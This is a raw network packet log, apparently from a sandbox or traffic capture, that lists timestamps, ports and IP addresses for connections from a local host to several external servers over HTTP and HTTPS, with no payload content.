Sep 27, 2024 01:49:49.348721981 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348735094 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348752022 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348783970 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348834038 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348845959 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348856926 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348876953 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348877907 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348887920 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348891973 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348898888 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348910093 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348920107 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348953009 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.349004030 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.349015951 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.349026918 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.349031925 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.349041939 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.349061012 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.349077940 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.349081039 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.349090099 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.349101067 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.349112988 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.349122047 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.349128962 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.349133968 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.349144936 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.349155903 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.349167109 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.349167109 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.349199057 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.349220991 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.433439970 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.433460951 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.433473110 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.433640957 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.551278114 CEST	49735	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:49.551312923 CEST	443	49735	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:49.551402092 CEST	49735	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:49.551659107 CEST	49735	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:49.551667929 CEST	443	49735	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:50.028213024 CEST	49736	443	192.168.2.8	104.21.36.139
Sep 27, 2024 01:49:50.028255939 CEST	443	49736	104.21.36.139	192.168.2.8
Sep 27, 2024 01:49:50.028321981 CEST	49736	443	192.168.2.8	104.21.36.139
Sep 27, 2024 01:49:50.032875061 CEST	49736	443	192.168.2.8	104.21.36.139
Sep 27, 2024 01:49:50.032891989 CEST	443	49736	104.21.36.139	192.168.2.8
Sep 27, 2024 01:49:50.206583977 CEST	443	49735	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:50.206670046 CEST	49735	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:50.226932049 CEST	49735	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:50.226944923 CEST	443	49735	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:50.238986969 CEST	49735	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:50.238996983 CEST	443	49735	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:50.505218983 CEST	443	49736	104.21.36.139	192.168.2.8
Sep 27, 2024 01:49:50.505331993 CEST	49736	443	192.168.2.8	104.21.36.139
Sep 27, 2024 01:49:50.543185949 CEST	49736	443	192.168.2.8	104.21.36.139
Sep 27, 2024 01:49:50.543221951 CEST	443	49736	104.21.36.139	192.168.2.8
Sep 27, 2024 01:49:50.544105053 CEST	443	49736	104.21.36.139	192.168.2.8
Sep 27, 2024 01:49:50.590836048 CEST	49736	443	192.168.2.8	104.21.36.139
Sep 27, 2024 01:49:50.758511066 CEST	49736	443	192.168.2.8	104.21.36.139
Sep 27, 2024 01:49:50.758610964 CEST	49736	443	192.168.2.8	104.21.36.139
Sep 27, 2024 01:49:50.758847952 CEST	443	49736	104.21.36.139	192.168.2.8
Sep 27, 2024 01:49:51.104748964 CEST	443	49735	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:51.104855061 CEST	443	49735	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:51.104922056 CEST	49735	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:51.104922056 CEST	49735	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:51.105081081 CEST	49735	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:51.105103970 CEST	443	49735	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:51.106713057 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.111464024 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.165832043 CEST	443	49736	104.21.36.139	192.168.2.8
Sep 27, 2024 01:49:51.165944099 CEST	443	49736	104.21.36.139	192.168.2.8
Sep 27, 2024 01:49:51.166024923 CEST	49736	443	192.168.2.8	104.21.36.139
Sep 27, 2024 01:49:51.167969942 CEST	49736	443	192.168.2.8	104.21.36.139
Sep 27, 2024 01:49:51.167988062 CEST	443	49736	104.21.36.139	192.168.2.8
Sep 27, 2024 01:49:51.184801102 CEST	49737	443	192.168.2.8	172.67.132.32
Sep 27, 2024 01:49:51.184834957 CEST	443	49737	172.67.132.32	192.168.2.8
Sep 27, 2024 01:49:51.184909105 CEST	49737	443	192.168.2.8	172.67.132.32
Sep 27, 2024 01:49:51.185208082 CEST	49737	443	192.168.2.8	172.67.132.32
Sep 27, 2024 01:49:51.185220003 CEST	443	49737	172.67.132.32	192.168.2.8
Sep 27, 2024 01:49:51.289612055 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289635897 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289648056 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289659023 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289669037 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289699078 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289710045 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289710999 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.289721012 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289732933 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289737940 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289762974 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.289767981 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289794922 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289804935 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289813042 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.289815903 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289824963 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.289825916 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289858103 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289859056 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.289869070 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289881945 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289886951 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.289891958 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289916039 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289916992 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.289932966 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289944887 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289954901 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289966106 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289969921 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289973974 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.289980888 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.289989948 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.289994955 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290015936 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290026903 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290038109 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290047884 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290054083 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290060043 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290070057 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290072918 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290080070 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290091991 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290101051 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290107965 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290112972 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290123940 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290129900 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290133953 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290144920 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290154934 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290158987 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290168047 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290174007 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290205002 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290291071 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290302992 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290313959 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290327072 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290334940 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290338039 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290350914 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290360928 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290397882 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290441036 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290453911 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290463924 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290481091 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290489912 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290492058 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290503979 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290503979 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290515900 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290528059 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290534973 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290539980 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290565014 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290576935 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290587902 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290589094 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290599108 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290610075 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290620089 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290623903 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290648937 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290654898 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290661097 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290672064 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290676117 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290683985 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290708065 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290714025 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290724993 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290735960 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290736914 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290747881 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290754080 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290760040 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290786028 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290821075 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290862083 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290874004 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290884018 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290895939 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290906906 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290915012 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290918112 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290927887 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290930033 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290941000 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290952921 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290957928 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290983915 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.290992975 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.290998936 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.291002989 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291016102 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291026115 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291030884 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.291054964 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291065931 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291076899 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291088104 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291095018 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.291095018 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.291110992 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.291135073 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.291192055 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291202068 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291212082 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291224003 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291229963 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.291237116 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291246891 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291259050 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291270018 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291274071 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.291281939 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291304111 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.291320086 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.291352034 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291363001 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291373968 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291394949 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291400909 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.291407108 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291429996 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.291433096 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291445017 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291456938 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291464090 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.291469097 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291474104 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.291480064 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291490078 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291501999 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291517019 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.291549921 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.291573048 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291584969 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291596889 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291613102 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.291626930 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291636944 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291646004 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.291649103 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.291676998 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.291697025 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376156092 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376174927 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376199007 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376221895 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376234055 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376245022 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376256943 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376267910 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376267910 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376281977 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376327038 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376338005 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376351118 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376367092 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376380920 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376395941 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376400948 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376400948 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376406908 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376416922 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376441956 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376441956 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376460075 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376466036 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376476049 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376487970 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376494884 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376497984 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376508951 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376509905 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376524925 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376537085 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376548052 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376552105 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376560926 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376590014 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376612902 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376632929 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376643896 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376657009 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376667976 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376674891 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376678944 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376689911 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376702070 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376708031 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376712084 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376723051 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376750946 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376750946 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376760960 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376771927 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376791954 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376826048 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376879930 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376890898 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376900911 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376912117 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376934052 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376936913 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376949072 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376950026 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376960039 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376971006 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.376987934 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.376997948 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377007961 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377017021 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377018929 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377029896 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377034903 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377044916 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377048016 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377064943 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377096891 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377142906 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377154112 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377163887 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377192974 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377193928 CEST	49734	80	192.168.2.8	147.45.44.104
